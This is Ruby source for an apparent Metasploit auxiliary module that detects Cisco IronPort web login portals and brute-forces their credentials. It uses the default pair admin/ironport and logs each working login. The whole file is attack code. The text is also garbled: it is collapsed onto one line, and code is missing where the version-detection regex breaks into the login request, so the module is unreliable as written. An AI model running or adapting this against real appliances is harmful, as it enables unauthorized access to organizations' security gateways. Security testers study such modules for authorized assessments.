## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/http' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, 'Name' => 'Cisco Ironport Bruteforce Login Utility', 'Description' => %{ This module scans for Cisco Ironport SMA, WSA and ESA web login portals, finds AsyncOS versions, and performs login brute force to identify valid credentials. }, 'Author' => [ 'Karn Ganeshen ', ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SSL' => true } )) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [true, "A specific username to authenticate as", "admin"]), OptString.new('PASSWORD', [true, "A specific password to authenticate with", "ironport"]) ]) end def run_host(ip) unless check_conn? print_error("#{rhost}:#{rport} - Connection failed, Aborting...") return end unless is_app_ironport? print_error("#{rhost}:#{rport} - Application does not appear to be Cisco Ironport. Module will not continue.") return end print_status("#{rhost}:#{rport} - Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end end def check_conn? begin res = send_request_cgi( { 'uri' => '/', 'method' => 'GET' }) if res print_good("#{rhost}:#{rport} - Server is responsive...") return true end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE end false end # # What's the point of running this module if the app actually isn't Cisco IronPort # def is_app_ironport? res = send_request_cgi( { 'uri' => '/', 'method' => 'GET' }) if res && res.get_cookies cookie = res.get_cookies res = send_request_cgi( { 'uri' => "/help/wwhelp/wwhimpl/common/html/default.htm", 'method' => 'GET', 'cookie' => cookie }) if (res and res.code == 200 and res.body.include?('Cisco IronPort AsyncOS')) version_key = /Cisco IronPort AsyncOS (.+? )/ version = res.body.scan(version_key).flatten[0].gsub('"','') product_key = /for (.*) '/login', 'method' => 'POST', 'vars_post' => { 'action' => 'Login', 'referrer' => '', 'screen' => 'login', 'username' => user, 'password' => pass } }) if res and res.get_cookies.include?('authenticated=') print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.get_cookies.inspect) return :next_user else vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting") return :abort end end end